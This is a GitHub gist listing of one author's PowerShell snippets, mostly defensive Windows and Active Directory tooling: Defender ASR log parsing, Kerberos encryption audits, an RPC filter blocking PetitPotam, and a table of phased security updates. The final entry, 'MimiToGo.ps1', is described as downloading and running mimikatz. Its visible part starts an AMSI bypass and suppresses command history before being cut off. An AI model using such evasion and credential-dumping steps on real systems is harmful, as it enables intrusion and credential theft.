
Christoph Falta cfalta

@cfalta
cfalta / reset-pw.ps1
Created November 22, 2022 21:04
Veeeeery crude pw reset script
function Export-UserToCsV
{
Get-ADUser -Filter * -Properties * | Select-Object samaccountname,description | Export-Csv .\userlist.csv -NoTypeInformation
}
function Get-Password([int]$Length)
{
if($Length -gt 0)
{
$Alphabet = @("0","1","2","3","4","5","6","7","8","9",":",";","<","=",">","?","!","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","_","a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z")
@cfalta
cfalta / asr-log-parser.ps1
Created October 21, 2022 19:24
Parses audit/block events from the Windows Defender Attack Surface Reduction rules into PowerShell objects for easier troubleshooting during a rollout
$ASRGuidMatrix = @{'56a863a9-875e-4185-98a7-b882c64b5ce5' = 'Block abuse of exploited vulnerable signed drivers';
'7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c' = 'Block Adobe Reader from creating child processes';
'd4f940ab-401b-4efc-aadc-ad5f3c50688a' = 'Block all Office applications from creating child processes';
'9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2' = 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)';
'be9ba2d9-53ea-4cdc-84e5-9b1eeee46550' = 'Block executable content from email client and webmail';
'01443614-cd74-433a-b99e-2ecdc07bfc25' = 'Block executable files from running unless they meet a prevalence, age, or trusted list criterion';
'5beb7efe-fd9a-4556-801d-275e5ffc04cc' = 'Block execution of potentially obfuscated scripts';
'd3e037e1-3eb8-44c8-a917-57927947596d' = 'Block JavaScript or VBScript from launching downloaded executable content';
'3b576869-a4ec-4529-8536-b80a7769e899' = 'Block Office applications from creating executable content';
'75668c1f-73b5-4cf0-bb93-3ecf5
@cfalta
cfalta / Get-LastKnownNetworks.ps1
Last active May 17, 2022 19:16
Queries the registry for the known network profiles and their first and last connection times. Useful for DFIR if you want to check when a host was last connected to a certain network.
function Get-LastKnownNetworks
{
function ConvertFrom-SystemTimeStructure
{
[CmdletBinding()]
Param (
[Parameter(ValueFromPipeline=$true)]
[ValidateNotNullOrEmpty()]
[String]

Windows Updates with phased rollout

A list of updates addressed in a phased rollout (a.k.a. enforcements) on Windows/Active Directory that I am aware of. Microsoft usually chooses this approach if they know that the final implementation of the update will likely break stuff. That's why there's always one or more initial phases that introduce new events or audit capabilities to let you check for potential impact before the final enforcement phase.

The first table lists update phases that are currently running. The second table lists enforcements that were once planned but then postponed (so they will reappear in the future, I guess).

Active enforcements

| Name | CVE | Initial Phases | Enforcement Phase | Event Log | EventCodes | Link |
| --- | --- | --- | --- | --- | --- | --- |
| LDAP Permission changes | CVE-2021-42291 | Phase 1: 9.11.2021 | 09.01.2024 | Directory Services | 3050, 3051, 3052, 3053, 3054, 3055, 3047, 3048, 3049, 3056, 3044, 3045, 3046 | https://support.microsoft.com/en-us/topic/kb5008383-active-directory-p |
@cfalta
cfalta / Get-KerberosEncryptionTypes.ps1
Last active July 14, 2023 15:27
The script shows the required encryption types for all kerberoastable user accounts (== user objects with an SPN). Every account that supports something other than AES will be marked as unsafe so you can filter for that.
<#
.SYNOPSIS
This is a simple script meant to help on your way towards better Kerberos encryption (looking at you, RC4!) with regard to Kerberoasting.
It shows the required encryption types for all kerberoastable user accounts (== user objects with an SPN). Every account that supports something other than AES will be marked as unsafe so you can filter for that.
Author: Christoph Falta (@cfalta)
.PARAMETER UnsafeOnly
@cfalta
cfalta / rpcfilter.txt
Created September 23, 2021 18:25
RPC filter to block PetitPotam and SpoolSample/PrinterBug. Usage: netsh -f rpcfilter.txt
rpc
filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
add filter
add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678-1234-ABCD-EF00-0123456789AB
@cfalta
cfalta / Test-Greynoise.ps1
Last active May 14, 2021 19:34
PowerShell function to check an IP against the public GreyNoise API
function Test-Greynoise
{
[CmdletBinding()]
Param (
[Parameter(Mandatory = $false, ValueFromPipeline = $true)]
[ValidatePattern('\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}')]
[String]
$IP)
if(-not $IP)
@cfalta
cfalta / PSArmoury-Example.ps1
Created January 19, 2021 12:17
Explanatory example to be used with PSArmoury
Write-Output "not inside function block"
function Invoke-Hello
{
Write-Output "hello from inside the function block"
}
@cfalta
cfalta / MimiToGo.ps1
Last active September 10, 2020 12:07
Download and run the latest mimikatz (quick check to see if it still works after a Windows update)
function Disable-AMSI
{
Set-PSReadlineOption -HistorySaveStyle SaveNothing
$AMSIBypass2=@"
using System;
using System.Runtime.InteropServices;
namespace RandomNamespace
{